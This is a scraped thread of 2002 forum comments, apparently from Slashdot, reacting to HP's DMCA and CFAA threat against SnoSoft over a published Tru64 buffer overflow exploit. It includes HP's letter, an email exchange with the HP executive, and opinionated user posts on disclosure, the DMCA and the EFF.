There are companies out there that don't worry about things like increasing shareholder wealth- many of those are privately held companies. There are also a lot of companies that seem to be much more concerned with the short-term stock market valuations, etc. and will do anything to "improve" their valuations short-term, including mass-layoffs, cooking the books, screwing the people of an entire state over to make their bottom line look better, etc. While it's not 100% true, there IS a reason why a lot of people think that companies solely exist to increase shareholder wealth.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Well at least u get an anser if u write to him (could be an automatic reply tho cause his mailbox has been spammed by the /. crows ;)
:-)". I can assure you that my :-). We also encourage our customers and 3rd parties
...
--- schnipp ---
Dirk,
Appreciate your note and concern. Let me just start by saying, "don't
believe everything you read in the press
primary interest and concern is for the Tru64 customers and that the
Tru64 engineering team is committed to finding and fixing any security
problem in the product and getting these fixes/notifications out to
customers ASAP. Trying to do everything possible for Tru64
customers is what motivates and brings me to work every day
(and night
that find security issues in the product to coordinate through the
CERT process, which has been set up to support both product
vendors and customers. Again, I appreciate your concern and
feedback.
Kent
-----Original Message-----
From: Dirk Lenneffer [mailto:*********.com]
Sent: Tuesday, July 30, 2002 11:42 PM
To: Ferson, Kent
Subject: TRUE64 exploit
dear mr. ferson,
instead of threatening the people who do YOUR work of finding bugs in
your product you should simply thank them, fix the bug and move along.
this last act of yours doesnt give us as customers great confidence in
your way of handling security related issues within your products.
best regards
--- schnapp ---
___________ LOAD"$",8,1
I'm glad HP is making all this noise. We've been discussing whether to purchase additional Sun boxes or consider some of HP's products. Now we know how HP operates. My supervisor has swung towards Sun. Thanks for the saber rattling HP. Sun may not be perfect but at least I know what their problems are and CAN DO something about it.
Has Comcast disconnected your Internet account? Same here. You can read about it at http://comcastissue.blogspot.com
Right now we're at the flaming torches stage. Pitchforks and scythes aren't too far off. Better have Igor stack a few more chairs against the lab door.
--
E_NOSIG
"That public disclosure drew the ire of Kent Ferson, a vice president in HP's Unix systems unit, who alleged in his letter on Monday that the post violated the DMCA and the Computer Fraud and Abuse Act."
HP / Bruce - the answer is obvious - you got too many VPs and not enough programmers. Fire Kent Ferson and hire me - at his salary.
world was created 5 seconds before this post as it is.
The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).
/. crowd, I'd like to say lets stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.
As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.
As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please not the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?
After talkig to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!
So as a member in good standing of the
This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.
Firestone tires on Explorers only affect the safety of the occupants of the vehicle, and isn't something other people can exploit. This HP situation is more analogous to publishing that the key locks and ignitions on all Explorers can be easily defeated with a safety pin.
Even this isn't a perfect analogy as the logistics of recalling & fixing all Explorers is far more complicated than making & distributing a software patch, and hence the problem may be in circulation for longer, but it's closer.
Not that I'm defending HP's actions -- they are now officially on my sh*t list. And not just because of the Absolutely Bogus Windows Printer Driver bug/easter egg...
as commented by dillon_rinker
The DMCA, among other things, can make it a crime to announce vulnerabilities in security code and devices [using free speech](if those are intended to protect copyright). Ergo, the DMCA is unconstitutional.
Perhaps HP is aware of this issue and is trying to press it in a manner that the DMCA can be declared unconstitutional and removed?
Sticks and Stones may break my bones, but copyright will always protect me.
This is what I wrote to the ACLU. maybe they'll notice. Personally, all of this is scaring the crap out of me.. The ramifications..
m l?tid=153
- - - - - -
A new violation of free speech by the DMCA:
You may have seen this already. Hewlett Packard is threatening to sue a computer security expert to *not* reveal a security flaw in their Tru64 operating system.
http://news.com.com/2100-1023-947325.html
Plainly put, I feel this is outrageous! HP knew of this flaw for over a year, and did nothing to prevent it!
As we become more dependent upon computers, it's not inconceivable that this flaw could be exploited to harm more than just data- if critical systems are controlled by a computer running this operating system (such as a power plant or a train switching system), a security exploit could mean the safety of human lives!
for more expert perspectives on this matter, please review the comments on this site:
http://slashdot.org/articles/02/07/31/0030239.sht
Thank you for your time. I hope this is not lost in the sea of emails you receive..
Yeah, I realized that after I looked at the preview on /. Oh well, hopefully she'll understand.
(B) + (D) + (B) + (D) = (K) + (&)
I never thought I'd see the day when I could put DMCA, Coward, Arrogant, and HP in one sentence.
So here goes: Who is the Arrogant Coward at HP that palyed the DMCA card?
I feel dirty for typing it.
if there is a p2p application that is difficult to DoS, and if RIAA circumvents that by reverse engineering... can they be sued as well?
Earlier this afternoon...
The Feds have raided an iMac convention, where they have taken over 3 dozen people into custody for having tools that "violate" DMCA policy. (i.e. Felt markers)
July 29, 2002
By Electronic and Certified Mail
Adriel T. Desautels
Secure Network Operations, Inc.
D/B/A SnoSoft
5 Oak Ridge Drive, Apt. # 2
Maynard, MA 01754
Re: Tru64 UNIX Buffer Overflow Exploit
Dear Mr. Desautels:
It has been brought to my attention that, on July 18, 2002, a buffer overflow exploit of Tru64 UNIX was posted on securityfocus.com under the alias phased@webtribe.net (a/k/a "phased", phased@mail.ru" and "James Green"). Based on information provided by Gil Novak to HP concerning aliases utilized by SnoSoft, we understand that this action was taken by an agent of SnoSoft despite SnoSoft's representations that it intended to comply with the industry standard practice of reporting its findings to CERT and despite the ongoing discussions between Gil Novak and Rich Boren on this issue.
Please be advised that the posting of the buffer overflow exploit has exposed SnoSoft and its members to potential federal criminal liability under both the Digital Millennium Copyright Act ("DMCA") and the Computer Fraud and Abuse Act. Under the DMCA, SnoSoft and its members could be fined up to $500,000 and imprisoned for up to five years for "offering to the public . . . any technology . . . that is primarily designed or produced for the purpose of circumventing protection afforded by a technological measure that effectively protects a right of a copyright owner." See 17 U.S.C. 1201(b). In addition, under the Computer Fraud and Abuse Act, if anyone uses the buffer overflow exploit posted by SnoSoft on securityfocus.com to cause damage to a Tru64 UNIX system, SnoSoft and its members could be subject to significant criminal sanctions, including up to ten years in prison. See 18 U.S.C. 1030(c)(3) & (4). Finally, SnoSoft and its members may face additional penalties under various criminal statues of the Commonwealth of Massachusetts including, but not limited to, criminal extortion (M.G.L. c. 265 25).
HP hereby requests that you cooperate with us to remove the buffer overflow exploit from securityfocus.com and to take all steps necessary to prevent the further dissemination by SnoSoft and its agents of this and similar exploits of Tru64 UNIX. If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith. Finally, HP also reserves its right to seek whatever legal recourse it has against SnoSoft and its members for monies and damages caused by the posting and any use of the buffer overflow exploit
Regards,
Kent Ferson
cc: Gil Novak
bcc: David Cardos
Rich Boren
autoreply
Thanks, HP, you evil fscks. I will now personally never buy another product you make EVER.
Carly can kiss my lily white ass, bitch.
Today, top company exectutives seem to be above the law.
The HP VP droid who did this is not acting above the law. He is using the law exactly as intended!
We need to get the law removed, not convince a bunch of corporations that they shouldn't use it!
-pmb
The founders of Secure Network Operations would like to thank all of you for your support in this issue. We will soon be providing you with updates to this issue on our web site. Thanks Again!! Regards, Snosoft Recon Team & The Cerebrum Project
http://www.msnbc.com/news/788216.asp?0dm=T14JT ....this just keeps getting better and better! --Snosoft
HP attempts to use DMCA against security researchers UPDATED: 2002-07-31 19:45 ET
This contains some new information from Kevin..
It's not clear from the article whether or not the hackers gave HP any prior warning before posting the exploit. If not, posting the exploit was irresponsible, and they should be prosecuted. I don't think the DMCA applies, however, since it's designed to prevent cracking copyrighted material. I don't see how hacking into a computer violates any copyrights.
Vote for Pedro
Another New HP "Invent"ion -- how to make money off of their own defects.
Goes right along with "Invent"ing ways to outsource and downsize.....
-- Ex HP Employeee, from the HP Way days...
This idea was invented by Shampoo.
Intent is always a factor in any criminal or legal proceeding. Intent is very important in deciding a case, because intent determines the purpose for the act in question, rather than the result.
Considering only the ends means you ignore the means, and the means may in fact be unconcienable, or even reprehensible.
The indirectness of the gain is immaterial to the fact that the motivation was gain.
Gain is not a *bad* reason, but it's not a reason which renders the act defensible, from a legal or moral standpoint.
Motivation speaks to ethicality of the action. If the motivation was base, then that's very different than if it had been principled.
-- Terry
http://www.siliconvalley.com/mld/siliconvalley/377 4570.htm
Power without responsibilty == tyranny, however you slice it.
--
When you go out of your way to call you, from Denmark no less, you do what everyone I talk to do ... "well, I haven't had time to take a shower today, and I want to do that" ...
... ;-)
Maybe it's just me
We do not live in the 21st century. We live in the 20 second century.
bleh... hit submit instead of preview.
anyway, as I was saying:
The fact that they are threatening legal action implies two things: They see this as a real threat; they prefer to suppress word of vulnerabilities rather than fix them.
The latter is not the sort of response I want from a vendor. It's especially grating when, in the past few days, Debian and RedHat, for instance, have responded promptly to every issue posted on BugTraq.